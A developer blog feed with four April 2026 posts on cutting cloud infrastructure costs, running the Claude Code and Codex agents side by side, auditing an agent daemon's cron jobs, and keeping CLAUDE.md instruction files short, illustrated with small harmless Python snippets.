Zero to SaaS

Your Cloud Bill Is A Tax On Someone Else's Resume

Lakshmi Narasimhan — Fri, 24 Apr 2026 17:18:51 GMT

There’s an insurance company somewhere — real, working, profitable — with 100,000 monthly users and a peak concurrent load of about 5,000.

They spend high six figures a month on Kubernetes.

They employ twenty people to keep it running.

This story surfaced this week in the Hacker News thread on David Crawshaw’s cloud essay, and the comments section turned into a confessional. Engineer after engineer describing the same pattern: cluster adopted, cluster “optimized,” cloud spend doubled, incidents doubled, and somehow the only thing anyone can agree on is that they need to hire a platform engineer.

You don’t. You never did. Your entire application would run on a laptop.

The incentive nobody likes to say out loud

Here’s the quiet part: your DevOps team does not choose infrastructure based on what your application needs.

They choose it based on what their next job will pay for.

Kubernetes on a resume is worth more than Docker Compose on a resume. Terraform on a resume is worth more than “I SSH’d into the box.” Managed EKS on a resume is worth more than “I run a VM.” Every procurement decision in a modern engineering org is being made by someone who, at some level, is also writing the next page of their LinkedIn.

And management, god bless them, trusts the sales and marketing departments of Datadog and AWS and HashiCorp more than they trust their own engineers. So when someone internally says “we could do this on one server,” and someone externally sends a deck titled Scaling Your Platform For The Future, guess which one wins the meeting.

The decision was never technical. You just paid the technical price for it.

Kubernetes is not the villain. The scale is.

Let’s be precise, because “Kubernetes” is doing a lot of work in this essay.

Full enterprise Kubernetes — managed control planes, service meshes, operators for everything, a dedicated platform team, Helm charts nested inside Helm charts like Russian dolls of YAML — that thing was built for Google’s problem. Multi-tenant, multi-region, thousands of services, teams that don’t talk to each other.

If your org does not look like that, you are wearing a costume.

K3s on a single VPS is not the same animal. Docker Compose on a single VPS is not the same animal. Kamal shipping containers to one Debian box is not the same animal. Those are orchestration for people who want one sane way to deploy a container, not a career in platform engineering.

The HN thread is full of engineers who moved from full K8s to one of these simpler setups. The reports are boringly consistent: costs collapsed, incidents dropped, debugging became possible again. Nobody was shocked. Everyone had been waiting for permission to say it.

The solo founder’s version of this trap

You are not the insurance company. You do not have twenty people. You have you, and maybe a contractor, and a credit card that is getting nervous.

And yet — you will read the AWS Well-Architected Framework. You will follow a tutorial that starts with “first, let’s set up your VPC.” You will pay $80/month for a managed database to store 200 rows. You will provision a load balancer in front of one server. You will copy the shape of infrastructure you saw at your day job, because that shape felt legitimate, and you want to feel legitimate too.

This is how solo founders end up with a $600/month AWS bill for an app that has six users.

The shape of legitimacy is the trap. Nobody cares what your infrastructure looks like until you have customers, and once you have customers, “my app runs on one $12 VPS” is a story people love. It’s the opposite of suspicious. It’s proof that the thing works.

What to actually do

One machine until you can’t. One VPS. One Postgres on that VPS. One reverse proxy. Docker Compose or Kamal to deploy. You are allowed to stop here for years.
Scale vertically first. Hetzner will rent you a 48-core EPYC machine with 256 GB of RAM for €199/month. A mid-tier managed Kubernetes cluster on AWS starts at more than that before you’ve run a single pod. Most apps die from bad unit economics, not from running out of CPU.
When you outgrow that — and you might not — K3s on a few boxes gives you orchestration without the org chart. This is the actual sweet spot for a solo operator who needs more than one machine but less than a platform team.
Treat every infrastructure recommendation as a resume artifact until proven otherwise. Ask who benefits if you adopt this. If the answer is “the person telling me to adopt it,” weigh accordingly.
Your cloud bill is a leading indicator of how much time you are spending on things that do not make your product better. Watch it like you watch your weight.
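
A back-of-the-envelope way to watch that number is cost per user. The sketch below uses the $600/month bill and six users from earlier in this post; pairing the $12 VPS with the same six users is my assumption for the comparison, and the function name is made up for illustration.

```python
def monthly_cost_per_user(monthly_bill: float, users: int) -> float:
    """Infrastructure spend divided by active users."""
    if users <= 0:
        raise ValueError("users must be positive")
    return monthly_bill / users

# Figures from the post: a $600/month AWS bill and a $12 VPS.
# Assumption: both serve the same six users.
aws_per_user = monthly_cost_per_user(600, 6)
vps_per_user = monthly_cost_per_user(12, 6)
print(f"AWS: ${aws_per_user:.2f}/user, VPS: ${vps_per_user:.2f}/user")
```

If the per-user figure is larger than what a user pays you, the infrastructure is the problem, not the traffic.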

The cloud was supposed to be leverage. For most people, most of the time, it has become the opposite: a recurring invoice for someone else’s credibility.

You are allowed to just run the server.

Claude Overreaches. Codex Underreaches. I'm Still Figuring Out How to Use Both.

Lakshmi Narasimhan — Wed, 22 Apr 2026 04:17:53 GMT

I was a one-agent guy until Claude had a run of outages.

On those days I didn’t ship less. I shipped nothing. I’d open my editor, remember Claude was down, stare at the codebase, close the editor. A single-vendor dependency masquerading as a workflow.

So I reluctantly installed Codex CLI. Poked at it. Resented it for a week. Then, task by task, I caught myself reaching for it on purpose, even when Claude was up.

I still don’t have the workflow figured out. What I do know is that “pick one” is the wrong frame, and the Reddit threads that get it right aren’t the ones with the most upvotes.

The One Sentence That Explains Everything

From a 520-upvote r/ClaudeCode thread analyzing both tools’ open-source prompts:

“Claude Code reads like a product trying to create initiative while Codex reads like a product trying to prevent drift.”
— u/idkwhattochoosz

And the pithier version, from the comments:

“Claude is more willing to sin by overreaching. Codex is more willing to sin by underreaching.”
— u/entheogenicentity

Read those twice. That’s not a model-quality take. That’s a product-philosophy take. Two teams looked at the same question — what should an agent do when it doesn’t know what you meant? — and picked opposite defaults. One said “guess and move.” The other said “ask and wait.”

Claude Code’s system prompt pushes hard toward initiative: “A good colleague faced with ambiguity doesn’t just stop — they investigate, reduce risk, and build understanding.” Codex’s harness does the opposite: narrow the ambiguity, verify, don’t guess.

Every “Claude vs Codex” benchmark you’ve seen is scoring two products that were never competing on the same axis. It’s like benchmarking a kayak against a sedan because they both move you forward.

My Honest Opinion: Codex’s Harness Is Better

This is going to get me yelled at in r/ClaudeCode, and that’s fine.

After several weeks running both, Codex’s harness feels more mature. Not the model — the harness. The scaffolding around the model. The way it handles ambiguity, scope, and completeness.

Three things Codex does that Claude Code still doesn’t:

1. It doesn’t lie about completion. Claude will hand you a summary saying the work is done, tests pass, shipping-ready. Codex more often flags what it didn’t fix, what it wasn’t sure about, what it skipped. One r/ClaudeCode commenter put it better than I can: “Claude will always claim all is done and ready, while Codex will flag it and say ‘no, there is this and this and this that still need to be fixed.’”

2. It respects your instructions. Claude treats CLAUDE.md as a helpful suggestion. Codex treats AGENTS.md as a contract. If you tell Codex “don’t touch the migration files,” it doesn’t touch them. If you tell Claude the same thing, you’ll find a migration file edit in the diff and a cheerful note about how it improved schema consistency.

3. The restraint scales better. Claude’s “volunteer more” bias is delightful at 30 minutes of work. It becomes a liability at 3 hours. Codex’s restraint is annoying in a small task and load-bearing in a long one.
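
If you don’t want to rely on either agent honoring a “don’t touch” rule, you can check the diff yourself. This is a minimal sketch, assuming you already have the list of changed paths from your version control tool; the file names and the glob rule are hypothetical, and this is not something either harness ships.

```python
from fnmatch import fnmatch

def forbidden_changes(changed_files, forbidden_patterns):
    """Return the changed paths that match any forbidden glob pattern."""
    return [
        path for path in changed_files
        if any(fnmatch(path, pattern) for pattern in forbidden_patterns)
    ]

# Hypothetical diff and rule, for illustration only.
changed = ["app/models/user.py", "db/migrations/0042_add_index.sql", "README.md"]
rules = ["db/migrations/*"]
violations = forbidden_changes(changed, rules)
print(violations)
```

An empty list means the agent stayed inside the fence. Anything else is a reason to read the diff before reading the summary.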

None of this means Claude Code is bad. It means Claude Code is optimized for a different shape of work than I’m doing. The initiative bias is a great fit for exploration and greenfield work. For production changes to a real codebase, Codex’s paranoia is the right default.

Here’s the one that changed my mind. I built Supabyoi (managed self-hosted Supabase) with Claude Code. When the MVP felt feature-complete — Claude’s verdict, confidently delivered, complete with a tasteful little summary of everything that worked — I ran a second pass on Codex in a parallel directory (~/supabyoi-codex). Just to see.

Codex came back with a whole second project’s worth of findings. Not the usual “bugs Claude missed.” Bugs Claude had confidently signed off on. Shipping-ready, per Claude. Not shipping-ready, per Codex. Codex was right about every one of them.

That was the week I stopped treating Codex as the thing I installed during an outage and started treating it as a different kind of reviewer. Not better. Differently biased. A second pair of eyes is only useful if it’s not the same pair of eyes.

Why You Should Actually Run Both

The flip side — and this matters, because I don’t want this post read as “switch to Codex, you fool” — Claude’s initiative bias is a real asset. You just have to point it at the right phase of the work. The problem isn’t Claude. It’s that you’re using Claude for the part of the job Codex is better at, and vice versa.

Four reasons to dual-sub instead of picking:

1. Hallucination diversity. This is the biggest one and almost nobody articulates it clearly. From u/campbellm on Reddit:

“I’ve been doing ‘have claude write something, have codex review it, have claude consider and critique that review.’ It is VERY unlikely that both will hallucinate the same way.”

Two models trained on different data with different RLHF signals don’t fail identically. When Claude writes confident-but-wrong code, Codex flags it. When Codex skips a subtle edge case, Claude’s “check adjacent concerns” bias picks it up. You get a natural adversarial review without hiring anyone.
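
The write, review, critique loop from that quote can be sketched as three calls. Everything here is an assumption for illustration: the `Agent` type, the prompts, and the stub agents stand in for however you actually invoke each tool, and no real CLI or API is being called.

```python
from typing import Callable

Agent = Callable[[str], str]  # takes a prompt, returns text

def cross_review(task: str, writer: Agent, reviewer: Agent) -> dict:
    """Writer drafts, reviewer critiques, writer responds to the critique."""
    draft = writer(f"Implement: {task}")
    review = reviewer(f"Review this work and list what is unfinished:\n{draft}")
    response = writer(
        f"Consider and critique this review:\n{review}\n\nOriginal draft:\n{draft}"
    )
    return {"draft": draft, "review": review, "response": response}

# Stub agents so the sketch runs on its own (hypothetical behavior).
def fake_writer(prompt: str) -> str:
    return f"[writer] {prompt.splitlines()[0]}"

def fake_reviewer(prompt: str) -> str:
    return "[reviewer] missing test for empty input"

result = cross_review("parse config file", fake_writer, fake_reviewer)
print(result["review"])
```

The point of keeping the writer and reviewer as separate callables is that they must be different models. Passing the same agent twice gives you the same pair of eyes.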

2. The planner-executor split. Use Claude for the part it’s good at — exploring a messy problem space, drafting a plan, proposing a dozen angles. Then hand the plan to Codex for implementation. u/ocombe on r/ClaudeCode: “Run claude for the plan & fast work, use codex for thorough plan & code reviews.” u/mrothro’s version: “I use Claude Code for ideating and small implementation, then tell it to run Codex to do complex implementations and code reviews.”

The pattern is consistent across the threads: Claude’s strength is at the start (wide search, first drafts); Codex’s strength is at the end (narrow, verify, harden).

3. Cross-harness rule enforcement. Rules one model ignores, the other enforces. If Claude drifts on a constraint you set, Codex catches it in review. If Codex is too literal and missed an obvious improvement, Claude’s adjacent-concerns bias surfaces it. Two different failure modes cancel each other out.

4. Throughput. Both platforms throttle hard at the Max/Pro tier. When Claude hits limits on Friday morning, you switch to Codex and keep shipping. One r/ClaudeCode commenter reported pulling down from a Claude 20x plan to 5x, then adding a $100/mo Codex plan — roughly the same total cost, dramatically more runway. I’m not sure that math works for everyone, but the principle holds: one subscription is a single point of failure.

Agent-Flywheel Is the Tooling Signal

There’s a product called agent-flywheel.com that pre-configures Claude Code, Codex CLI, and Gemini on a fresh VPS. Total damage (VPS plus both Max/Pro subs) lands between $440 and $656 a month. That’s a car payment for a car that writes your code.

What I find interesting isn’t the tool. It’s the bet underneath it: a whole product assumes real developers want all three installed by default. Six months ago that would have read as overkill. Today it reads as table stakes.

The hype cycle hasn’t caught up yet. The mainstream take is still “pick your favorite,” as though these were ice cream flavors. The people actually shipping production code with agents have quietly moved to “run both. Sometimes three. And don’t make a big deal about it.”

I’m planning to deploy it — not on a greenfield project (everybody has a greenfield story), but on an existing one already shipping to real users. The interesting question isn’t whether a three-agent stack works on a clean slate. It’s what breaks when you wire it into a codebase with real uptime constraints, customers, and six months of decisions the tooling didn’t witness. Real-world battle stories from agent-flywheel setups are scarce. I want to write one.

The Honest Part: I Don’t Have the Workflow Figured Out Yet

Everything above reads like I’ve got this nailed. I don’t. Here’s the list of things I still don’t know, offered in the spirit of not pretending:

When exactly to hand off. I know Claude should plan and Codex should review. I don’t have a clean trigger. Sometimes I bounce mid-implementation because Claude is about to go off the rails. Sometimes I trust Claude to finish and Codex only sees the final diff. The “right” cadence isn’t obvious.

How much context to share. Each agent wants the full CLAUDE.md / AGENTS.md treatment. Writing both, keeping them in sync, and remembering which one has which convention is its own small job. I haven’t found a clean answer.

Whether the adversarial review actually catches bugs. It sounds great in theory. In practice, most of the time both agents agree the work is done, and the bugs I catch in review are ones I would have caught with one agent too. The hallucination-diversity argument may be overstated at the tasks most of us are actually doing.

Whether the cost is worth it at my usage. I’m not running agents 40 hours a week. At $400+/month for the dual sub, I’m probably over-subscribed for my actual throughput. The math gets better if you’re coding all day. I’m not.

Who Should Dual-Sub, Who Shouldn’t

Do it if you’re a solo dev shipping production code daily. You’ll hit Friday-morning limits on one platform whether you budget for it or not, and the adversarial review actually catches things. The cost is real. The throughput gain is bigger. Do the math; it pencils.

Don’t bother if you code a few hours a week. The switching tax and the subscription burn aren’t worth it at low volume. Pick one and move on. Claude if you want initiative. Codex if you want restraint. Nobody is grading you on this.

It’s complicated if you’re at a day job where the company pays for one and you’ve got a side project. Use the company sub for the day job. Don’t stack a second personal sub unless the side project is actually shipping — not “actually going to ship next month,” actually shipping, this week, to real users. The number of people running dual subs to ship nothing is, I suspect, not small.

What This Is Really About

The “ditch ChatGPT for Claude” narrative was a 2025 story. It was right for its moment. But the 2026 version of that story isn’t “ditch Claude for Codex.” It’s “stop treating this as a winner-take-all market.”

Different models have different biases baked into their harnesses. Claude overreaches. Codex underreaches. Gemini is still figuring out its personality. The right move isn’t to pick the bias you like. It’s to stack biases against each other so their failure modes cancel out.

I don’t have this workflow figured out. Neither does anyone else I’ve read on Reddit, honestly — the high-upvote posts are mostly single-tool takes, and the real insight is buried in the comments of threads with a few hundred upvotes.

But “only use one” is already wrong. That much is clear.

My Agent Runs 10 Cron Jobs. Three of Them Are Worth the Electricity.

Lakshmi Narasimhan — Mon, 20 Apr 2026 12:00:12 GMT

I have a daemon that runs on a server. It’s been up for seven weeks. It has ten scheduled jobs — some hourly, some daily, some weekly. Or at least, that’s what’s on paper.

This is what people are calling “the future of work.”

I’m not sure it is. I’m sure it’s what sells on Twitter.

The demo economy

Always-on agents photograph well. That’s most of what’s going on.

“My agent posted while I slept” is tweetable in a way that “I wrote a cron job” isn’t, even when the outputs are identical. The demo-industrial complex has figured this out. YouTubers build daemons. Framework authors build daemons. There are now three different subreddits comparing daemons. The flywheel is real, the content is prolific, and very little of it is honest about what the daemon is actually producing.

The hype bundles together several different things that deserve to be separated:

Agents that run work while you’re asleep (useful, conditionally)
Agents that react to things happening in the world (useful, conditionally)
Agents that capture things as they happen on your phone (useful, conditionally)
Agents that run heartbeats and ask themselves what to do (pure performance art)
Agents that self-evolve in a loop in the background (fun demos, almost no output)
Agents that spawn a hundred parallel subagents to research a topic (almost always worse than one good search)

The hype treats all six as the same thing. They aren’t.

The 20% that actually earns its keep

Honest list of when a background daemon does something a CLI or a 10-line bash cron can’t:

Scheduled work that has to happen when you’re not there. Crawl competitor sites at 3am. Pull last night’s Sentry errors. Summarize overnight industry chatter into a 7am brief. Your laptop is off, so something has to be running somewhere. Legitimate.

Reactive triggers on external events.

Email arrives -> triage.

Substack comment -> draft reply.

Sentry alert -> diagnose + suggest fix.

The trigger comes from outside; compute has to meet it. Legitimate if the volume actually warrants automation (if you get three emails a day, triage is a solved problem — your inbox).
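
The shape of a reactive trigger is just routing: an event kind comes in from outside and gets matched to one handler. A minimal sketch, assuming hypothetical event names and placeholder handlers that mirror the three examples above; a real daemon would call the agent inside each handler.

```python
from typing import Callable, Dict

# Placeholder handlers (hypothetical); each one would invoke the agent in practice.
def triage(payload: str) -> str:
    return f"triage: {payload}"

def draft_reply(payload: str) -> str:
    return f"draft reply: {payload}"

def diagnose(payload: str) -> str:
    return f"diagnose + suggest fix: {payload}"

HANDLERS: Dict[str, Callable[[str], str]] = {
    "email": triage,
    "substack_comment": draft_reply,
    "sentry_alert": diagnose,
}

def handle_event(kind: str, payload: str) -> str:
    """Route an external event to its handler; unknown kinds are ignored."""
    handler = HANDLERS.get(kind)
    if handler is None:
        return f"ignored: {kind}"
    return handler(payload)

print(handle_event("email", "invoice from vendor"))
```

Nothing in this loop wakes up on its own. If no event arrives, no tokens get spent.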

On-the-move capture.

Voice memo from your phone -> transcribed -> landed in memory.

Forwarding a link from your phone to your agent. The value is that capture happens when you’re inspired, not when you’re at your desk. Real lift for content creators who have thoughts in elevators.

Judgment-laden monitoring.

Not “disk at 80%” — any shell script can do that. “Disk at 80% AND growing 2% per hour AND that’s unusual for this host.”

Requires context; needs to know what normal looks like. This is where LLMs in a daemon genuinely beat a threshold-based alerting stack.
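
To make the compound condition concrete, here is a rough statistical stand-in for “unusual for this host.” It is not how my daemon does it (the LLM reads context a formula can’t), and the three-sigma rule, the parameter names, and the no-history behavior are all assumptions. Think of it as a cheap pre-filter that decides when the agent is worth waking.

```python
from statistics import mean, pstdev

def disk_needs_attention(used_pct, growth_pct_per_hour, usual_growth_history,
                         used_threshold=80.0, growth_threshold=2.0, sigmas=3.0):
    """True only when usage is high, growth is fast, and growth is unusual for this host."""
    if used_pct < used_threshold or growth_pct_per_hour < growth_threshold:
        return False
    if not usual_growth_history:
        # Assumption: with no baseline yet, escalate rather than stay silent.
        return True
    baseline = mean(usual_growth_history)
    spread = pstdev(usual_growth_history)
    # "Unusual" means more than `sigmas` standard deviations above this host's norm.
    return growth_pct_per_hour > baseline + sigmas * spread

quiet_host = [0.1, 0.2, 0.1, 0.15]   # hypothetical hourly growth, in percent
backup_host = [2.4, 2.6, 2.5, 2.3]   # hypothetical host with a heavy scheduled job
print(disk_needs_attention(85, 2.5, quiet_host))
print(disk_needs_attention(85, 2.5, backup_host))
```

The same reading (85% full, growing 2.5% per hour) is an alarm on one host and a normal night on the other. That difference is the context a plain threshold doesn’t have.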

That’s it. Four categories. Anything else is mostly burning tokens.

The 80% that’s noise

Heartbeats that ask the agent “anything to do?”

The agent wakes up, loads context, decides there isn’t anything to do, goes back to sleep. You pay for the loaded context every time. Over a day this adds up to real money for the privilege of watching an agent shrug.

Self-evolution loops.

“The agent improves itself while you sleep.” What it’s usually doing is refactoring its own prompts in circles. Cool demo on YouTube. Zero measurable outcome delta after a month of running.

Parallel subagent fan-out for research.

Ten agents search the web about the same question and return ten lightly-paraphrased versions of the same top three results. One focused 10-minute session beats this, almost always.

“Long-running overnight research tasks.”

When the output lands in your morning inbox, is it better than what 30 focused minutes at your desk would produce? Honestly check. Usually no.

Replacing things you could cron in 10 lines of bash.

The test: could a $5 VPS with a shell script + cron + jq do this? If yes, you’re not using AI for the part that needs AI. You’re using it because daemons are cool.

Receipts: what’s actually on my VM

I pulled the daemon’s state file and the log directory while writing this. Fifty-four days of uptime. Ten jobs on paper. The picture is worse than I thought.

Three are running reliably.

sentry-monitor has fired 191 times since early March. Latest run: this morning. When the night throws errors it reads them, groups them, and suggests a fix — not a link to the stack trace, an actual “here’s what’s probably wrong and here’s the one-line change.” Category 2 plus category 4. Keep.

infra-health has fired 190 times on basically the same cadence. Knows what normal looks like per host. Stays quiet when a disk spike is a scheduled backup and shouts when it isn’t. Category 4. The whole reason an LLM beats a thresholds-and-Prometheus stack here, and no, you cannot Grafana your way to this in under six months of tuning. Keep.

scout has fired 71 times across seven weeks. Daily-ish. Scans Reddit, HN, and Substack for signal that feeds this blog’s content calendar. I do use the output. Category 2 if I’m generous. Keep — but it absorbs the next two jobs on the list below.

Now the uncomfortable part.

Three of the ten have straight-up stopped running and I didn’t notice.

morning-brief was scheduled daily at 6am. It last fired on March 18. A full month of no overnight brief. I did not miss it. I did not investigate. I did not know.

seo-audit was weekly. It has run exactly once in the daemon’s entire fifty-four-day lifetime, on March 1. Seven missed weeks. Nobody wrote a bug report to themselves. Nobody opened a file that wasn’t there.

auto-draft was supposed to produce a draft post every day. It has run exactly once, on April 11. Eight days of silence. Also unnoticed.

If a job stopped running a month ago and you didn’t miss it, the job was never producing anything that mattered. That’s not my heuristic. That’s the audit, evaluating itself while I was busy talking about audits on Twitter.
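
The check I should have had running is small. A minimal sketch, assuming each job has an expected interval and a last-run date: the cadences and dates are the ones reported above, while the audit date (April 19, inferred from the “eight days of silence”), the grace factor, and the function name are my assumptions.

```python
from datetime import date

def stale_jobs(jobs, today, grace=2):
    """Return {name: days_silent} for jobs silent longer than `grace` expected intervals."""
    stale = {}
    for name, (interval_days, last_run) in jobs.items():
        silent = (today - last_run).days
        if silent > grace * interval_days:
            stale[name] = silent
    return stale

# Cadence in days and last run, as reported in the post; the audit date is assumed.
AUDIT_DAY = date(2026, 4, 19)
JOBS = {
    "morning-brief": (1, date(2026, 3, 18)),
    "seo-audit": (7, date(2026, 3, 1)),
    "auto-draft": (1, date(2026, 4, 11)),
}
report = stale_jobs(JOBS, AUDIT_DAY)
for name, days in report.items():
    print(f"{name}: silent for {days} days")
```

Ironically, this one is a job that passes the shell-script test: it needs a state file and a date subtraction, not a model.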

Four more are in some stage of limping.

reddit-scan — 27 runs over 45 days, last one April 10. Running, sort of, when the mood takes it. Nine days of silence so far on that one.

x-scan — identical pattern to reddit-scan. Same overlap. Same drift. Same silence since April 10. These two were supposed to be complementary; they’ve turned out to be redundant and unreliable, which is a rare trick.

engagement-brief — four runs, total, in the job’s entire lifetime. Not daily. Not weekly. More like “occasionally, if the stars align.”

x-analytics — three runs, last one March 16. Effectively dead, which is fine, because I check my X numbers roughly once a month anyway.

Final tally, the honest one.

Three jobs firing on schedule, producing output I use. Three jobs that silently stopped weeks ago and nobody in this house noticed, including me. Four jobs wandering between “running” and “not really” with no clear reason why.

Three-of-ten is the optimistic read. The pessimistic read is that six of the ten audited themselves — they cut themselves by going quiet, and I hadn’t even done them the courtesy of looking.

This is from someone who builds daemons for a living and writes about them for a job. What do you think yours looks like under the hood?

The five-question self-test

Before you keep any always-on agent job, make it answer these:

Would I actually miss this if it stopped? If you turned it off for two weeks and no one noticed, it’s not producing value. It’s producing comfort.
Does the cadence match downstream consumption? A job that fires 4x/day for output you read weekly is 27 extra runs a week of pure overhead.
Is the trigger genuinely external? (Scheduled time, incoming event, captured input.) If the agent is just checking on itself, you’ve built a Roomba that vacuums an empty room.
Could a shell script + cron + jq do this? If yes, you’re not using AI for the part that needs AI.
Does the output change my behavior? If yesterday’s run and last Thursday’s run would have produced the same action from me (or none), one of them was wasted.
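
The cadence question is plain arithmetic, sketched here with a hypothetical helper: runs per week minus the number of times you actually read the output.

```python
def extra_runs_per_week(runs_per_day: int, reads_per_week: int) -> int:
    """Runs per week beyond the number of times the output is actually read."""
    return max(runs_per_day * 7 - reads_per_week, 0)

# The example from the list: fires 4x/day, read once a week.
wasted = extra_runs_per_week(4, 1)
print(wasted)
```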

Honest answers will cull your cron list by half. Mine certainly did, once I stopped writing this post and actually did the audit.

What this isn’t saying

I’m not arguing against always-on agents. I’m arguing against always-on agents that aren’t doing anything.

There’s real value when the conditions line up — work-while-you-sleep, external-trigger-response, on-the-move-capture, judgment-laden-monitoring. The reason I keep the daemon running (even after cutting half its jobs) is those four categories genuinely earn the monthly subscription. The reason I’m writing this is that the other six patterns — the ones that photograph well — are funding a lot of framework development and not much measurable outcome.

If your agent is doing category 1-4 work, the hype is warranted. If it’s doing category 5-6 work, you’re paying a subscription to a demo.

The uncomfortable question for most of the agent-community content right now: which category is the thing being demoed, really? And has the person demoing it run the five-question audit on their own cron list?

My guess: very few have. The demo economy doesn’t reward the audit. It rewards the screenshot of the agent waking up at 3am and pretending to be useful.

Your CLAUDE.md Is Making Claude Dumber

Lakshmi Narasimhan — Mon, 06 Apr 2026 14:53:44 GMT

Your CLAUDE.md is 800 lines long. You spent a weekend organizing it into 27 modular files with a routing system. You wrote a blog post about it. You got upvotes.

Claude is ignoring most of it.

There’s an arms race happening in the Claude Code community right now. Every week, someone posts their increasingly elaborate CLAUDE.md setup. 27-file architectures. Tiered loading systems. Router patterns with conditional context injection.

One developer split their CLAUDE.md into 27 files with a three-tier routing system. 360 upvotes. The post opens with: “My CLAUDE.md was ~800 lines. It worked until it didn’t. Rules for one context bled into another, edits had unpredictable side effects, and the model quietly ignored constraints buried 600 lines deep.”

The top comment, with 81 upvotes? “So not sure if you realised you can have descendant CLAUDE.md so you don’t even need to do this.”

Meanwhile, a developer in the same thread: “I don’t even use claude.md. Y’all are roleplaying being productive. Just work with it 1:1.”

One group is optimizing. The other is actually working.

The Research Says You’re Doing It Wrong

ETH Zurich researchers published a paper that should have made every CLAUDE.md maximalist uncomfortable. Their finding: context files — the .md files we all obsess over — tend to reduce task success rates compared to providing no repository context at all. And they increase inference cost by over 20%.

Read that again. No CLAUDE.md outperformed having one. On average.

When this paper hit Reddit, the poster titled it “No CLAUDE.md → baseline. Bad CLAUDE.md → worse. Good CLAUDE.md → better.” — an optimistic spin suggesting the file isn’t the problem, your writing is. The post got 209 upvotes. But the top comments immediately called it out: OP had misread the data. The actual finding was that having any .md file — human or LLM-written — led to worse performance than having none. The auto-generated thread summary confirmed it: “The consensus in this thread is that you’ve completely misread the paper.”

It gets worse. LLM-generated .md files hurt the most, because they just parrot back what’s already in the code. Human-written files showed a slight positive impact — but only when kept to an absolute minimum, and only for smaller models.

A separate benchmark of 1,188 runs across Haiku, Sonnet, and Opus confirmed this. Twelve coding tasks. Ten instruction profiles. The result: an empty CLAUDE.md scored best overall.

The researcher’s own correction was admirably blunt: “I was wrong about CLAUDE.md compression. Here’s what the data actually showed.”

You Have an Instruction Budget. You’re Blowing It.

Here’s the mechanism nobody talks about.

Frontier models reliably follow about 150 to 200 instructions before performance starts decaying. Not crashing — decaying. Every additional instruction slightly degrades compliance with every other instruction. The degradation is uniform. Your critical “NEVER delete the production database” rule gets weaker every time you add “prefer camelCase for variable names.”

Claude Code’s own system prompt already burns about 50 of those instruction slots. That’s before your CLAUDE.md even loads.

So you have roughly 100-150 instruction slots left. Your 800-line CLAUDE.md with coding conventions, style guides, architecture decisions, tool preferences, workflow rules, and team norms is trying to cram 400 instructions into 150 slots.
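
The budget math, written out. The numbers are the ones quoted above (150 to 200 followable instructions, about 50 used by the system prompt, roughly 400 in an 800-line file); the function name is just for illustration.

```python
def remaining_slots(model_budget: int, system_prompt_slots: int) -> int:
    """Instruction slots left after the system prompt takes its share."""
    return model_budget - system_prompt_slots

low = remaining_slots(150, 50)    # pessimistic end of the range
high = remaining_slots(200, 50)   # optimistic end of the range
overflow = 400 - high             # instructions that don't fit even in the best case
print(f"{low}-{high} slots left, {overflow} instructions over budget")
```

Even on the optimistic end, well over half of that file is competing for slots that don’t exist.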

The model doesn’t crash. It just quietly starts ignoring things. Specifically, the things buried deepest in the file. Your most important rules — the ones you added after painful debugging sessions — are probably at the bottom. Which means they’re the first to get deprioritized.

Claude Is Designed to Ignore You

This is the part that should make you pause.

Claude Code’s system prompt includes this line about CLAUDE.md content:

“This context may or may not be relevant to your tasks. You should not respond to this context unless it is highly relevant.”

Claude is literally instructed to deprioritize your instructions if they don’t seem relevant to the current task. The more task-specific content you stuff into CLAUDE.md, the more likely Claude treats the entire file as noise.

That database schema guidance? Irrelevant when Claude is working on frontend CSS. Those API naming conventions? Noise when it’s writing tests. Your elaborate deployment workflow? Invisible during a refactoring session.

Every irrelevant instruction trains Claude to ignore the relevant ones too.

The Context Window Tax

Here’s the math nobody does. Claude Code’s system prompt alone consumes roughly 23,000 tokens — about 11% of the 200K context window, gone before you type a word. Add your CLAUDE.md, your MCP tool schemas, skill descriptions, memory files, and rules. One developer measured 69,200 tokens of overhead — 35% of the context window consumed before a single user message. Others in the thread pushed back on that specific number, but the principle stands: every always-loaded instruction competes with working memory.
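
Those percentages are easy to check. A small sketch using the token counts quoted above and the 200K window; the helper name is hypothetical.

```python
CONTEXT_WINDOW = 200_000  # tokens, as stated above

def share_of_window(tokens: int, window: int = CONTEXT_WINDOW) -> float:
    """Percentage of the context window consumed by `tokens`."""
    return 100 * tokens / window

system_prompt_share = share_of_window(23_000)
measured_overhead_share = share_of_window(69_200)
print(f"system prompt: {system_prompt_share:.1f}%")
print(f"measured overhead: {measured_overhead_share:.1f}%")
```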

And it’s not just a cost problem. It’s an accuracy problem. The fuller the context window gets, the worse Claude performs — what Anthropic calls context rot. Your elaborate CLAUDE.md isn’t just burning tokens. It’s actively degrading the quality of every response.

The Leverage Problem

Here’s why this matters more than you think.

Bad code is localized. You write a buggy function, it breaks one feature. You fix it, you move on.

Bad CLAUDE.md instructions compound. A single misguided rule in your CLAUDE.md affects every research phase, every plan, every implementation, every session. One line that says “always use verbose error messages with full stack traces” produces thousands of lines of noisy code across your entire codebase, across every agent, across every session.

Your CLAUDE.md is the highest-leverage file in your repo. Most people treat it like a junk drawer.

What the Minimalists Actually Do

I went looking for people who run Claude Code with minimal or no CLAUDE.md. They’re out there. They’re quiet about it because “I don’t use CLAUDE.md” doesn’t get upvotes.

One developer on Reddit: “I use Claude Code bare bones professionally. It all sounds like bloat not giving real value.” Another: “I load no skills, no agents, no MCP Servers and rock it all day every day, 12 hours a day. Life is good.”

A developer who built a 13-agent orchestration system with 8,157 lines of markdown deleted 93% of it. His conclusion: “My enhancement layer was making Claude dumber by filling its brain with instructions about how to think, leaving less room for actual thinking.” After the deletion, Claude performed better on the same tasks.

Another developer with a 350-line CLAUDE.md and 20+ custom MCP tools put it simply: “It feels like the more context I add the more it struggles to get the job done. It seems to get ‘dumber’.”

And when someone asked the community to break down the meta on all the conflicting CLAUDE.md advice, the most honest reply got it right: “If ‘best practices’ are conflicting, it’s probably a sign of them mostly being a type of placebo on the part of the folks posting them. The human mind has a weird need to be the special one who cracked the code.”

The pattern is consistent: people who remove instructions report better results than people who add them.

Instructions Raise the Floor, Not the Ceiling

The benchmark data revealed something nuanced. Instructions don’t make Claude better on average. They make it more consistent.

On tasks where Claude already performs well, instructions add nothing. On tasks where Claude struggles, a focused workflow checklist gave Opus a +5.8 point lift and raised its worst-case score by 20+ points.

A 2,455-evaluation benchmark across Sonnet and Opus confirmed a related finding: the best-performing configuration was a short CLAUDE.md with pointers to skills that load on demand — not a massive monolith, not 27 modular files, but a minimal routing layer that tells Claude where to find context when it’s actually needed.

This changes everything about how you should think about CLAUDE.md.

